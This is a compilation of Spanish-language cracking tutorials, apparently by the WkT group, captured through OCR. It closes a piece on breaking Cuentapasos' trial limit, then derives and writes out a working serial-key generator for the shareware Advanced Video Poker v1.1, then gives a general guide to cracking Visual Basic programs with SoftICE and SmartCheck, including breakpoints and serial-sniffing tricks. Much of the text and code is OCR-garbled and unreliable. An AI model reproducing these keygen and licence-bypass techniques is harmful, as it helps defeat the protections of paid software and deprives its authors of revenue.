Hemos mostrado como una protección como la de la nagscreen, correctamente implementada 
por el autor de la aplicación, puede ser fácilmente burlada porque el autor cometió el "error" de 
programar en Visual Basic. De paso, hemos sacado del baúl una técnica casi olvidada pero de 
una gran potencia, mediante la cual podríamos entre otras cosas, automatizar tareas, rellenar 
formularios automáticamente, gastar bromas, etc... 


Hasta aquí, nada nuevo. 


La novedad es el p-code. Inicialmente, en una primera toma de contacto, los programas p-code 
confunden y pueden terminar por aburrir al más intrépido ingeniero inverso. Está invención de 
Microsoft, desde el punto de vista teórico, puede parecer un gran avance ya que está a un paso 
de la creación de programas que puedan ejecutarse en cualquier máquina, independientemente 
del procesador o sistema operativo, siempre y cuando existan unas librerías diseñadas para 
dicha máquina o sistema operativo que interpreten el código del ejecutable. 


Nada más lejos de la realidad. Lo que en código nativo es una simple instrucción como la resta, 
se convierte en los programas p-compilados en varias instrucciones. Igual ocurre con el resto: 
push, add,... Esto, inevitablemente conduce a que las aplicaciones se enlentezcan o, lo que es lo 
mismo, que necesitemos más recursos (procesadores más rápidos) para poder mantener las 
mismas prestaciones. Esta política de Microsoft, por supuesto favorece a los fabricantes de 
hardware como Intel. 


Desde el punto de vista de la ingeniería inversa, supone una metedura de pata más de Microsoft 
(y van ...). Identificando convenientemente las funciones de interés, podremos facilmente 
desentrañar las protecciones de las aplicaciones. En este tutorial se ha expuesto un método que 
puede, sistemáticamente, echar abajo casi cualquier sistema de protección de aplicaciones p- 
compiladas, basado en limitaciones en el número de ejecuciones, periodos de pruebas, etc... Es 
cuestión de acostumbrarse, donde poníamos antes breakpoints de ejecución ahora ponemos 
breakpoints de acceso a memoria, donde el EIP decía ahora dice el ES... 


En cierto modo es triste ver como los desvelos de un programador por proteger su aplicación, 
colocando protecciones a diestro y siniestro, y creando un sistema de protección en conjunto 
bastante robusto, salta en mil pedazos por el hecho de haber utilizado Visual Basic y su "p- 
compilación". Si el futuro del Visual Basic pasa por el p-code ... o le abrimos los ojos a los 


programadores y reaccionan o creo que la ingeniería inversa de VB se va a volver muy aburrida. 


Para ilustrar dicho método, lo hemos utilizado contra una de las pocas aplicaciones p- 
compiladas que he podido encontrar (por ahora): nuestro entrañable Cuentapasos. Pero no creais 
que sus protecciones se limitan tan solo a la nagscreen y al periodo de evaluación. ¡Que va! El 
Cuentapasos no se acaba ahí, esconde muchos más secretos. Desviaros de la senda seguida en 
este tutorial para deshacer su protección, buscad caminos alternativos. Quedan muchas 
preguntas por responder: 


e Dónde se guardan los días transcurridos? O se guarda la fecha de instalación? 

e Dónde se guarda el otro protagonista de la resta, el límite de 30 días? ¿Y si lo 
cambiamos? 

e Cómo se registra el programa? De dónde sale el código de compra? 

e Por qué no cambia el número de días transcurridos si cambio la fecha? Cuándo se 
actualiza? 

e El cálculo de los días transcurridos, es igual al ejecutar las primeras veces el 
Cuentapasos que después? 

e Por qué en algunos ordenadores se cierra el programa a los pocos minutos de conexión? 


Investigad, y os encontrareis destellos de calidad del programador, de los que da gusto encontrar 
en un producto nacional, y alguna que otra metedura de pata, de las que hacen que te caigas al 
suelo de risa ;-D 


Como veis, se podría escribir un libro sobre el Cuentapasos (este tutorial ya es casi un libro). 


En cierta manera somos nosotros los que obligamos a los programadores a profundizar en el 
arte de la programación. Y gran parte de lo que aprenden en el sano intento de "jodernos", lo 
aplican en otras facetas de sus aplicaciones, mejorando sus prestaciones. Aunque la mayoría no 
lo quieran reconocer, parte de lo que saben nos lo deben a nosotros, los "crackers". 


Y por supuestísimo, parte de lo que sabemos nosotros se lo debemos a las "comeduras de coco" 
de ellos a la hora de implementar una protección. 
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Whiskey Kon Tekila 


Programa Advanced Video Poker v1.1 | W95 / W98 / NT 
Descripción Juego de Poker al estilo Casino 
Tipo Shareware 


Url http://www.aha.ru/-aasamson/download/ 


[Protección | Número de Serie. Time Limit 30 Dias 

[Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 

| Herramientas  [Smartcheck v6.01 (Build 952) 

Objetivo | Buscar el número de serie y crear su Key-Generator 

Cracker [Mr.GReeN [WkT!] 

ea de Ags de 


Vi 


Introducción 


El programa es un clásico juego de Poker al estilo de los casinos norteamericanos, 
ameno y bonito. Su protección es de 30 dias, libre de nags o recordatorios que nos 
induzcan a registrar el programa. Pasados los 30 dias se acabó, no juegas más. 
Programa elaborado en Visual Basic e interesante para comenzar a usar Smartcheck 
para estudiar el comportamiento de la rutina generadora del número de serie 


Vi 


Manos a la obra! 


Cargamos Smartcheck y desde ahí lanzamos el programa que vamos a estudiar. Bien 
, vamos a incorporar gráficos para ilustrar mejor el comportamiento de Smrtck, de 
acuerdo? Así nos resultará más fácil de comprenderlo (y menos teclas a tocar pa mi 
xDDDD). Lanzamos el programa desde la opción Program/Start y una vez dentro de 
él nos vamos a la opción Register. Entramos como nombre: Usuario 
Registrado[WkT!] y como número de serie, mi número mágico: 9900990099, ¡vale, 
vamos allá! 


String [85] -> Integer [85] 


Integer (170) -> String (1 70") 


$% ValStrina:'170") retums double:170 [displayed as single-precision floating point 
$% Mid$íStrina: "Usuario..." long:2, VARIANT:Integer:3] 

»£ 

$% Asc(String: "Usuario ..."') retums Integer:85 

9% SiWVARIANT:Double:255) 

P. String ("255") --> Integer (255) 

A 

$% ValString:'"370") retums double:370 [displayed as single-precision floating point 
9% Mid$(Strino:"Usuario ...", long:3, VARIANT: Integer: 4) 


double:572 [displayed as single-precision floating point 
$% Mid$(String:"Usuario ...", long:4, VARIANT:Integer:5) 

9% AscíString: "ario '") retums Integer: 97 

$% AscíString: "Usuario ...”) retums Integer:85 

$% SiWVARIANT:Double:657) 


. 2 Cria MMLCERFRIAL s lrtrarmar (10571 


Mirad bien el comportamiento de la rutina. Toma el primer caracter del nombre y su 
código ASCII y se suma consigo mismo, al resultado le llamaremos SUMA 
(170=85+85), luego toma el segundo caracter (s) cuyo valor ASCH es 115, ok?, 


85 (cód ASCHU de "U"), sume- mos otra vez: 170+85+115= 370, ahora SUMA=370. 
Ya tenemos la fórmula, SUMA + Cód.ASCII del primer carácter del nombre + cód. 
ASCII de cada uno de los caracteres del nombre, al final, esto dá un resultado, en 
este caso: 4355, Bien qué hace, además, la ru- tina de cálculo del número de 
serie???, veamos: 


Integer (4355) --> String ("'4355""] 
WalíString:"'4355"] returns double:4355 [displayed as single-precisic 


Len(VARIANT[Double: 4355] feturns LONG:7793016 

Len(vARIANT|Double:8710) returns LONG:7793016 

Len(YARIA4NT|Double:85710] returns LONG:7793016 

Len(vARIA4NT bee returns LONG:7793016 
Len(YARIA4NTID ouble:1 4420] returns LONG:7733016 
LenfVARIANT returns LONG: 7793016 
Len VARIANT retums LONG:7793016 
Len(vARIANTiDouble:69680] returns LONG:7733016 
Len(YARIA4NT Double: 0) returns LONG:7793016 
LenfVARIANT:Double: 139360) retums LONG:7793016 


Len(vARIANT:Double:139360] retums LONG:7733016 
Len(YARIANT:D ouble: 278720] retums LONG:7793016 


do 
Le 
Lo 
% LenVARIANT:Double:278720]/retums LONG:7793016 
% Len(VARIANT:Double:557440)lretums LONG:7793016 
Lo 
do 
Lo 
Lo 
do 


ybbo4bo..e. y 
Lo fe Le Le fe £e Le £e ía 


Len(YARIANT:D ouble:557440) retuma LONG:7793016 

Len(váR ANTeuble 114860500) retumns LONG:7793016 
Len(vARIANT Double 114888+006] returns LONG:7793016 
Len(YARIANT:Double:2.22376e+006] returns LONG:7793016 


Len(YARIANT:Double:2.223976e+006] returns LONG:77393016 


el RATUARIT Mil A AE OOO tc MAI RINA 


Bueno, parece fácil, no?. 4355 * 2 = 8710; 8710 * 2 = 17420; etc. etc. etc...., pero 
cuan- tas veces realiza esta operación?, 36 veces, al final dá un número LONG que 
parece ser el número de serie deseado, veamos, despues de la larga cuenta, nos 
arroja: 748183302963- 20, parece un numero de serie en toda regla, pero aún no 
acaba la cosa aquí, porque si en- tramos este LONG, nos lo escupe con los siento 
Burt Lancaster, la cagaste. :) Así pues, con tinuamos. 


$% LenvAHIAN IU OUDIe: /.491938+U13) retums LUNA: /¿33U Ib 
$% Len(VARIANT:Double:7.48183e+013) retums LONG:7793016 


Len(ARIANT:Double:1.49637e+014) returns LONG:77393016 
Ea txtCode.Text 
Ela txiCode.Text 


Aqui, subrayadito esta: 149637e+014, o sea: 149636660592640, 
Uallllaaaaaaaaaa!!!!. Exito total, lo entramos y.... Thanks!!! el mensaje feliz! Yatá, I 
got it!!! That's all folk!!!. 


Pero que ha hecho?. Lo ha reducido. Mientras la cifra final sea mayor que 
200000000000000H, cifra = cifra /2, esto os lo digo yo que me lo he curra o:) 


Bien ya tenemos todos los ingredientes para confeccionar el KeyGen. Amos allá! 


Suma=Asc(ler. caracter nombre) + asc(cadauno de los caracteres del nombre), 
tantas veces como letras tenga el nombre. En Basic seria algo así: 


L=Len (nombre$) .......... Longitud del nombre. 


(cod.asc.primer.caracter) btt = Asc(left$(nombref$, 1)) ... en nuestro caso: 85 


Ahora vamos a buscar el número sagrado que se vá multiplicar 36 veces. Sería algo 
asi: 


Forx=1ToL 


ef = Asc(MidS(nombre$, x, 1)):....en e se lamacena el ASCII de cada caracter del 
nombre 


suma+t = sumatt + ef + bH 


Next 
Ok!, en suma tenemos yá almacenado el numero dorado, 4355 


La segunda parte es: 


Forx=1 To 36 
suma+ = suma+ + suma+t 
Next 


sumatt = 74818330296320, pero no nos vale. 
la tercera parte del keygen es: 


While suma? >= 200000000000000+ 
suma+t = suma+t / 2 
Wend 


Ahora suma+f contiene el serial correcto para ese nombre: 149636660592640 


y ya hemos confeccionado el KeyGen. No es ná, gracias y tá otra! 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 
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CRACKEANDO EN 
VISUAL BASIC 


Tutorial por: Esiel2. 
1) Introduccion. 
2) Primeros Pasos: Configuracion de Nuestras Herramientas. 
3) Descompiladores para Visual Basic. 
4) Crackeando Usando el Soft-Ice. 
5) Crackeando Usando el Smartcheck. 
6) La Alternativa: La Funcion Hmemcpy. 


7) Lista de Posibles Breakpoints en Visual Basic 5 y ¿6? 


1) Introduccion. 


Antes de empezar quisiera decir que hago este tutorial para que quien lo 
lea sepa lo basico a mi entender que debe tener de herramientas y unos 
conocimientos de algunas funciones que tanto le gusta llamar el visual 
basic, a su dll de alma (nunca mejor dicho) MSVBVM50.DLL o la 
ultima version MSVBVM60.DLL para poder hacer algo interesante sin 
que nada nos estorbe. Cada vez nos encontramos con mas programas 
hechos en visual basic, espero que este tutorial te sirva para abordarlos. 


Las herramientas necesarias o imprescindibles, mas bien esto 
ultimo son el poco ;) conocido Soft-ice y el Smartcheck, cuanto mas 
actualizado pues mejor ;). Espero que te sirva de base para crackear 
estos programas, y si te fijas, no cambia mucho la forma de afrontar las 
protecciones con respecto a otros programas compilados en otros 
lenguajes. 


2) Primeros Pasos: Configuracion de Nuestras Herramientas. 


Lo primero de todo claro esta es despues de tener las herramientas, configurarlas como 
'dios' manda para que haga lo que nosotros necesitamos ya que si no de poco nos sirve bajarnos 
tantos megas. 


Para configurar el soft-ice, no hay problema porque si ya hemos crackeado antes 
tendremos bien configurado el programa, no obstante aqui pongo mi winice.dat (cada uno lo 
puede adoptar a sus gustos, seguro que hay mejores formas, pero a mi me va bien asi) por si hay 
dudas al respecto: 


// Aquií empieza // 


NMI=ON 
SIWVIDRANGE=0N 
LOWERCASE=0N 
MOUSE=0N 
NOLEDS=0FF 
NOPAGE=0FF 
PENTIUM=0N 
THREADP=0N 
VERBOSE=0N 


PHYSMB=128 
SYM=312 
HST=512 
DRAWSIZE=2048 
TRA=8 


INIT="WL;WR;WD;X;" 


Fl="h;" 
F2="»wr;" 
F3="src;" 
F4=""1s;" 


F5="Ax; " 


F6=""ec;" 

F7=""here;" 

ES=""" 

F9=""bpx;" 

F10="2p;" 

F11=""G ESS:ESP;" 
F12=""p ret;" 
SF3=""format;" 
CF8=""XT;" 
CF9="TRACE OFF;" 
CF10=""XP;" 
CF11="SHOW B;" 
CF12="TRACE B;" 
AF1=""wr;" 

AF2=""wd;" 

AF3=""wc;" 
AF4="»ww;" 
AF5="CLS);" 
AF8="A»XTR;" 
AF11=""dd dataaddr->0;" 
AF12=""dd dataaddr->4;" 
CF1="altscr off; lines 60; wc 32; wd 8;" 
CF2=""wr;"wd;wc;" 


EXP=c.Wwindowsisystemikernel32.dll 
EXP=c.Wwindowsisystemiuser32.dll 
EXP=c.Wwindowsisystemigdi32.d1l 
EXP=c.Wwindowsisystemibivbx10.dll 
EXP=c.Wwindowsisystemicomdlg32.dll 
EXP=c.Wwindowssystemishell32.d1l 
EXP=c.Wwindowsisystemiadvapi32.dll 
EXP=c:.1Wwindowslsystemishell232.d1l 
EXP=CAwindowslsystemibivbx10.dll 
EXP=c.Wwindowsisystemicomcetl32.d1l 


WDMEXPORTS=0FF 
MONITOR=0 
PHYSMB=16 
SYM=312 

HST=256 

TRA=8 

MACROS=32 
DRAWSIZE=2048 


; WINICE.DAT 


; (SIWOSWINICE.DAT) 
; for use with SoftICE Version 3.2 (Windows 95) 
; 14 July 1997 


O O O O OO OOO ORO RON 
> 


; If your have MORE than 32MB of physical memory installed, change 
; the PHYSMB line to the correct ++ of Megabytes. 

; If you have LESS than 32MB you can save a bit of memory by 

; Specifying the correct + of Megabytes 

; Example: PHYSMB=32 

AE AAA AE ARAS ERA AREA AAN REA 
y ee Examples of sym files that can be included if you have the SDK +++ 
; Change the path to the appropriate drive and directory 
¡LOAD=cAwindowsisystemluser.exe 
¡LOAD=cAwindowsisystemligdi.exe 
¡LOAD=cAwindowsisystemikrn1386.exe 
¡LOAD=cAwindowsisystemimmsystem.dll 
¡LOAD=cAwindowsisystemiwin386.exe 

y ee Examples of export symbols that can be included *+**+** 

; Change the path to the appropriate drive and directory 
¡EXP=cwindowsisystemWvga.drv 

¡EXP=cAwindowsisystemWga.3gr 
¡EXP=cwindowsisystemisound.drv 
¡EXP=cAwindowsisystemimouse.drv 
¡EXP=cwindowsisysteminetware.drv 
¡EXP=cwindowsisystemisystem.drv 
¡EXP=cwindowsisystemlkeyboard.drv 
¡EXP=cwindowsisystemitoolhelp.dll 
¡EXP=cwindowsisystemishell.dll 
¡EXP=cwindowsisystemicommdlg.d!l 
¡EXP=cwindowsisystemlolesvr.dll 
¡EXP=cwindowsisystemlolecli.dll 
¡EXP=cwindowsisystemimmsystem.dll 
¡EXP=cwindowsisystemiwinoldap.mod 
¡EXP=cwindowsiprogman.exe 

¡EXP=cwindowsidrwatson.exe 

y ee Examples of export symbols that can be included for Windows 93 “tes 
; Change the path to the appropriate drive and directory 
¡EXP=cwindowsisystemicertdll.dll 
¡EXP=cwindowsisystemWersion.dll 
¡EXP=cwindowsisysteminetlib32.dll 


¡EXP=cAwindowsisystemimsshrui.dll 
¡EXP=cwindowsisystemimsnet32.dll 
¡EXP=cwindowsisystemimspw132.dll 
¡EXP=cwindowsisystemimpr.dll 
:exp=cwindowsisystemimsvbvm50.dll 
exp=c1windowsisystemimsvbvm60.dll 


// Aqui termina // 


Estas dos ultimas lineas del fichero winice.dat son importantisimas, si el programa que 
vas a crackear esta hecho en visual basic 5 (msvbvm50.dll) tienes que quitarle el ';' para que el 
soft-ice detecte cuando llama a dicha libreria porque si no ignoraria los breakpoints aunque este 
activa la del visual basic 6 (msvbvm60.dll), por lo demas funciona igual que con cualquier 


programa a crackear. 


Para configurar el smartcheck, tienes que ir menu program y en settings poner lo siguiente: 


21x] 


Error Detection | Reporting | Files to Check | Error Suppression | Program Info | 


SmartEheck can detect and report mary bypes of problema. Elick on a type to 
see additional settings. Clear a type if you dor't ant to check for thoze kindz 


of problernz. 


Type of errors ta check for Additional settings 


E: Memory errors e Erecktorunitaleed memornerrare 
12] Pointer errors 
Leaks 


[2] API and OLE function call error: 


Report errors immediately 


Adwanced... | 
T” Save theze settings as the initial values for new programes Default Settinos | 


Cancel | Help | 


Msc ape ea alejan 


E rente MENOR patera apodaca 0er 


21x] 


Error Detection Reporting | Filez to Check | Error Supprezsion Program Info | 


SmartEheck vall normally begin reporting events and errors immediately after starting the 
program. li pou mould hke to control when event reporting starte, clear the setting below. 


A A E E A 


O A ee 


— Report additional event: 
Information about the eventz below 1: z=ometimez valuable in diagnosing problems, but 
can significantly increaze the disk space used by SmariCheck as ibreporte evente. 
Select the evente pou would like SmartCheck to Include in its reporte. 
[Y Report handled Wisual Basic runtime errors 
[e Perform analysis of handled Visual Basic runtime errors 
Report Mouselmowe events from DC controls 
[- ReportWéindows messages 
[Y Report callback and hook function: 


Cancel | Help | 


Despues de tener configurarado las herramientas, es hora de entrar en materia con mas 
salsa. 


3) Descompiladores para Visual Basic 


Descompiladores de visual basic, que yo sepa existe para la 
version 3.0 de este lenguaje en la pagina de DODI (facil de buscar en 
cualquier buscador de internet como en altavista o yahoo), y me parece 
que existe otra version para el visual basic 4.0 pero yo no he probrado 
ninguna de las dos, asi que no puedo decir nada mas. En cuanto a las 
versiones 5.0 y 6.0, por lo menos hasta el momento de escribir este 
tutorial creo que no existe (no verlo, no quiere decir que no exista), asi 
que mala suerte no podemos usar ningun descompilador para los 
programas mas nuevos e interesantes. 


4) Crackeando Usando el Soft-Ice. 


Para empezar, tengo que decir esta herramienta sirve de igual 
modo para los programas realizados en visual basic que en los demas, 
solo hay que tener en cuenta unas cuantas cositas basicas como saber 
que cuando el programa a crackear te pide un password o un serial, este 
es guardado en una variable en formato ancho, es decir, si la clave fuese 
'esiel2' se almacenaria como 'e sie 12' con lo cual si hacemos una 
busqueda en memoria no encontrariamos ninguna direccion donde 
estaria almacenada y nos quedariamos algo extrañados(pero existe un 
breakpoint para esto muy interesante como son: 
MultiWideToWideChar y WideCharToMultiWide), con lo cual quiero 
decir que esto es un dato muy a tener en cuenta. 

Aclarado esto, ¿como podemos abordar un programa en Visual 
Basic utilizando Soft-Ice? ... Pues lo primero a mi modo de ver es lo 
siguiente, yo establecería una regla de semejanza, suponiendo que 
hayas hecho antes un crack, entonces los breakpoints de la derecha te 
deben ser familiares. 


VB breakpoints Breakpoints "normales" 
rtemsgbox messagebox/a/exa 
rtcinputbox getwindowtext/a, 

getdlgitemtext/a 
_ vbanew,  vbanew2 - dialogbox, 
dialogboxparam/a 
— vbastrcomp - Istremp 


Con estos breakpoints, ya te puedes hacer una idea de lo que se 
puede hacer, eso si, la cosa no es tan directa como en cualquier 


programa hecho en un leguaje de programacion decente asi que para 
llegar al meollo de lo que busques tendras que pasar de mucho codigo 
inservible pero todo llega, asi que solo es cosa de tener PACIENCIA. Y 
todo se reduce a trazar el programa como si no fuese realizado en 
Visual Basic. 


Luego, por ejemplo con rtemsgbox al usarlo tendrias que 
remontar codigo hacia atras para encontrar donde el programa ha 
tomado la decision de no registrarte para converncerle de lo contrario 
(es a lo que yo le llamo cracking retro, puesto que tienes ir siempre 
hacia atras en el codigo) esto es una tarea facil pero pesada ya que hay 
muchas llamadas inutiles. En cuanto al rtcinputbox, pues lo tipico, al 
introducir la clave o serial y pulsar sobre el boton aceptar pues 
volvemos al codigo y hariamos lo tipico que se suele hacer con las 
funciones getwindowtext/a y getdlgitemtext/a. El tercer breakpoint 
importante para mi es el__vbanew y __vbanew2 ya que mediante el 
podemos parar la ejecucion del programa antes de que nos saque un 
formulario, este breakpoint es muy util para los programas que tienen 
basada su proteccion en nagscreens. En cuanto a __ vbastrcomp, pues 
casi su propio nombre indica para que sirve asi que paso decir nada 
mas. ;) .... MUY UTIL. 


Como caso excepcional, esta el breakpoint rtcdoevents, ya que 
este breakpoint es muy usado por el compilador del visual basic, con lo 
cual puede parecer que no nos es de gran ayuda puesto que 
constantemente lo esta llamando pero sin embargo si lo es por la 
siguiente razon: cuando un programa realizado en visual basic tiene que 
realizar calculos que consume muchos recursos del sistema pues para 
no colgar el windows 9x pues el programador se ve obligado a insertar 
en el codigo la funcion doevents, con lo que se puede entrar en bucles 
donde solo se hagan calculos como por ejemplo en el cuentapasos el 
autor hace muchos calculos pero nosotros solo vemos la nagscreen pero 
mediande este breakpoint pues le jodemos el invento, asi que como 
conclusion, esta funcion es util cuando estamos seguros de que el 
programa hace muchos calculos y nosotros queremos meternos dentro 
para husmear un pokito. XD. 


Un ejemplillo de como crackear de esta manera lo podeis ver 
hechandole un vistazo al tutorial del Cuentapasos 3.72 y del Exploit 
Submission Wizard 5. 


5) Crackeando Usando el Smartcheck, 


Bien, el smartcheck es otra gran herramienta de los geniales 
programadores de Numega, pues con esta herramienta podemos ver las 
tripas de los programas realizados en Visual Basic, desde un simple 
vistazo y encontrar un serial valido, hasta ir analizando que va haciendo 
el programa paso a paso, como asiganaciones de variables sospechosas, 
conversiones de tipos de datos, acceso a apis, etc, etc. Luego, 
sabiendolo usar simplifica mucho el cracking para estos programas, 
pero como todo en la vida, lo mas importante es la experiencia, cuanto 
mas utilices este programa antes te daras cuenta de que es lo que 
verdaderamente te interesa ver y que es lo que te trae sin cuidado. 


Para hacer un cracking en 2 minutos lo mas comun es que nos 
pidan el tipico nombre y serial, e inmediatamente despues pues nos 
saque un bonito mensaje mediante msgbox del visual basic, pues 
mirando alrededor de este msgbox dentro del smartcheck pues nos 
encontraremos con un serial valido para nuestro nombre, asi de facil !!!. 
Tambien podemos hacer un generador de claves de forma relativamente 
sencilla puesto que si estamos viendo constantemente las asignaciones, 
conversiones de variables, comparacines, ... con los valores que van 
tomando en la ventana de la parte derecha del monitor asi pues solo 
tenemos que analizar con detenimiento y paciencia el listado que nos 
saca el smartchek y generar nuestro generador de claves. 


Un ejemplo sencillito de como crackear programas de esta forma 
es el tutorial del programa: Java script It! v1.3. 


6) La Alternativa: La Funcion Hmemcpy. 


Bien, esta funcion no suele comentarse mucho en los tuturiales 
pero es otra gran baza para nuestro menester puesto que como bien 
comenta Wkt_White en su tutorial generico sobre el uso de esta funcion 
podemos cazar los password o serial de una manera un poco sutil y facil 
(todo depende de los programadores, aunque si utilizan este lenguaje, 
no creo que se calienten la cabeza por impedir que esta funcion no nos 
sirva XD), en la mayoria de programas realizado en este lenguaje, 
aunque tengo que decir que siempre hay excepciones. 


Para ello, los pasos basicos a seguir (casi mecanicamente) son los 
siguientes: Primero despues de saber que es un programa VB, 
introducimos nuestro serial, ponemos el breakpoint bpx hmemcpy 
pulsamos Ctrl-D e inmediatamente pues volvemos al soft-ice y tenemos 
que FIJARNOS bien que en la linea que hay debajo del desensamblado 
aparezca nombredelprogramaacrackear!.text y a partir de aqui mirar 
detenidamente los push siguientes ya que se suelen almacenar el que tu 
has introducido y el correcto; si miras estos push, lo mas normal es que 
te encuentres con tu serial introducido 'e sie 12' y por ejemplo el 
correcto que podria ser 'EXPEDIENTE - X', ahora solo queda 
borrar los breakpoints y probar con este serial que has obtenido y en el 
75 % o mas de las veces es el serial correcto. 


NOTA: si te fijas las cadenas estan en formato ancho. El serial seria: 
'EXPEDIENTE - X'. 


7) Lista de Posibles Breakpoints en Visual Basic 5 y ¿6? 


Esta lista la obtuve de un tutorial en ingles, y no recuerdo 
exactamente el autor ya que la cogi, la corte del documento y lo puse en 
otro fichero para cuando me hiciese falta consultarlas, asi que ;(. 


Lista: 


Addr:OFOOA1BF Ord: 100 (0064h) Name: ThunRTMain 
Addr:0F03A65D Ord: 101 (0065h) Name: VBDIlUnRegisterServer 
Addr:0F05A843 Ord: 102 (0066h) Name: VBDIlICanUnloadNow 
Addr:0F0BF123 Ord: 103 (0067h) Name: VBDlIRegisterServer 
Addr:0F03137D Ord: 104 (0068h) Name: VBDIIGetClassObject 
Addr:0F04027D Ord: 105 (0069h) Name: UserDllMain 
Addr:0FOCDB46 Ord: 106 (006Ah) Name: DllRegisterServer 
Addr:0F0CDD17 Ord: 107 (006Bh) Name: DllUnregisterServer 
Addr:O0FOSC5AE Ord: 108 (006Ch) Name: __vbaAryLock 
Addr:0FOD9OFS Ord: 109 (006Dh) Name: __vbaBoolErrVar 
Addr:0FOD90EC Ord: 110 (006Eh) Name: __vbaStrErrVarCopy 
Addr:0F109E57 Ord: 111 (006Fh) Name: __ vbaAryVarVarg 
Addr:0F10A259 Ord: 112 (0070h) Name: __vbaFpCDbIR4 
Addr:0F10A259 Ord: 113 (0071h) Name: __vbaFpCDbIRS 
Addr:0F10A242 Ord: 114 (0072h) Name: _ vbaFpCSngR4 
Addr:0F10A242 Ord: 115 (0073h) Name: __vbaFpCSngR8 
Addr:0F10A270 Ord: 116 (0074h) Name: __vbaFpCmpCy 
Addr:0F10A1F7 Ord: 117 (0075h) Name: __vbaFpCy 
Addr:0F1021C9 Ord: 118 (0076h) Name: __vbaFpI2 
Addr:0F102FE8 Ord: 119 (0077h) Name: __vbaFpI4 
Addr:0F10A1E3 Ord: 120 (0078h) Name: __vbaFpR4 
Addr:0F101FA3 Ord: 121 (0079h) Name: __vbaFpR8 
Addr:0F10A1C5 Ord: 122 (007Ah) Name: __vbaFpUll 
Addr:0F01DC7F Ord: 123 (007Bh) Name: __vbaFreeObj 
Addr:0F01F878 Ord: 124 (007Ch) Name: __vbaFreeStr 
Addr:0FOFDOD2 Ord: 125 (007Dh) Name: __vbaFreeVar 
Addr:0F109B75 Ord: 126 (007Eh) Name: __vbaFreeVarg 
Addr:0FODDFOC Ord: 127 (007Fh) Name: __vbal2Abs 
Addr:0FO1BFDD Ord: 128 (0080h) Name: __vbal214 
Addr:0FODDES5S5 Ord: 129 (0081h) Name: __vbal2Sgn 
Addr:0FODDF29 Ord: 130 (0082h) Name: __vbal4Abs 
Addr:0FODDF6A Ord: 131 (0083h) Name: __vbal4Sgn 
Addr:0F01F8A3 Ord: 132 (0084h) Name: __vbaStrCopy 
Addr:OFOIFSDA Ord: 133 (0085h) Name: __vbaStrMove 
Addr:0F0407A5 Ord: 134 (0086h) Name: __vbaUlI1I2 
Addr:0F0407D3 Ord: 135 (0087h) Name: __vbaUI1I4 
Addr:0FODDF41 Ord: 136 (0088h) Name: __vbaUl1Sgn 


Addr:0F100CFE Ord: 137 (0089h) Name: __vbaVarCopy 
Addr:0F100C68 Ord: 138 (008Ah) Name: __vbaVarDup 
Addr:0F100E23 Ord: 139 (008Bh) Name: _ vbaVarMove 
Addr:0F101E51 Ord: 140 (008Ch) Name: _ vbaVarVargNofree 
Addr:0F109C1B Ord: 141 (008Dh) Name: __vbaVargParmRef 
Addr:0F109C29 Ord: 142 (008Eh) Name: __vbaVargVar 
Addr:0F109CB3 Ord: 143 (008Fh) Name: _ vbaVargVarCopy 
Addr:0F109CA3 Ord: 144 (0090h) Name: __ vbaVargVarMove 
Addr:0F109C7C Ord: 145 (0091h) Name: __vbaVargVarRef 
Addr:0FOCDE3C Ord: 146 (0092h) Name: DLLGetDocumentation 
Addr:0F0342AB Ord: 147 (0093h) Name: _Clatan 
Addr:0F0399BC Ord: 148 (0094h) Name: _Clcos 
Addr:0F01F2DD Ord: 149 (0095h) Name: _Clexp 
Addr:0F0342BS Ord: 150 (0096h) Name: _Cllog 
Addr:0F0399B2 Ord: 151 (0097h) Name: _Clsin 
Addr:0F0342BF Ord: 152 (0098h) Name: _Clsqrt 
Addr:OFOEA75B Ord: 153 (0099h) Name: _Cltan 
Addr:0F0SDO04F Ord: 154 (009Ah) Name: __vbaAptOffset 
Addr:0F058E7D Ord: 155 (009Bh) Name: __vbaAryConstruct 
Addr:0FOD002D Ord: 156 (009Ch) Name: __vbaAryCopy 
Addr:OFO1ESBA Ord: 157 (009Dh) Name: _ vbaAryDestruct 
Addr:0FODO066 Ord: 158 (009Eh) Name: __vbaAryMove 
Addr:0FO0D3880 Ord: 159 (009Fh) Name: __vbaAryRebasel Var 
Addr:0FOSC5CE Ord: 160 (O00A0h) Name: __vbaAryUnlock 
Addr:0F0401F9 Ord: 161 (00A1h) Name: _ vbaBoolStr 
Addr:0F01B3FD Ord: 162 (00A2h) Name: __vbaBoolVar 
Addr:0F100A35 Ord: 163 (00A3h) Name: _ vbaBoolVarNull 
Addr:0F1003B6 Ord: 164 (00A4h) Name: __vbaCastObj 
Addr:0F05CF87 Ord: 165 (0O0AS5h) Name: __vbaCastObjVar 
Addr:0F03050C Ord: 166 (00A6h) Name: __vbaCheckType 
Addr:OFOSFA8A Ord: 167 (00A7h) Name: _ vbaCheckTypeVar 
Addr:0FO1F90B Ord: 168 (O00OA8h) Name: __vbaChkstk 
Addr:0FO0D2D1F Ord: 169 (00A9h) Name: _ vbaCopyBytes 
Addr:0F0E1208 Ord: 170 (OOAAh) Name: __vbaCyAbs 
Addr:OFOEOF7E Ord: 171 (O0OABh) Name: __vbaCyAdd 
Addr:0FODEO0OOC Ord: 172 (00ACh) Name: __vbaCyErrVar 
Addr:0F0E1047 Ord: 173 (OOADh) Name: __vbaCyFix 
Addr:0F10B3BE Ord: 174 (0OOAEh) Name: __vbaCyForlnit 
Addr:0F10B3E7 Ord: 175 (0OAFh) Name: __vbaCyForNext 
Addr:0FOD904C Ord: 176 (00BOh) Name: __vbaCyl2 
Addr:0FOD9OSB Ord: 177 (00B 1h) Name: __vbaCyl4 
Addr:0FOE10C8 Ord: 178 (00B2h) Name: __vbaCylInt 
Addr:O0FOEOFCS5 Ord: 179 (00B3h) Name: __vbaCyMul 
Addr:OFOEOFF6 Ord: 180 (00B4h) Name: __vbaCyMull2 
Addr:0OFODDFDD Ord: 181 (00B5h) Name: __vbaCySgn 


Addr:0F0D8DO08 Ord: 182 (00B6h) Name: __vbaCyStr 
Addr:0FOEOF93 Ord: 183 (00B7h) Name: __vbaCySub 
Addr:0F0D903D Ord: 184 (00B8h) Name: __vbaCyUIl 
Addr:0FODE016 Ord: 185 (00B9h) Name: __vbaCyVar 
Addr:0F100284 Ord: 186 (OOBAh) Name: ProcCallEngine 
Addr:0F04F3E0 Ord: 187 (OOBBh) Name: DlIFunctionCall 
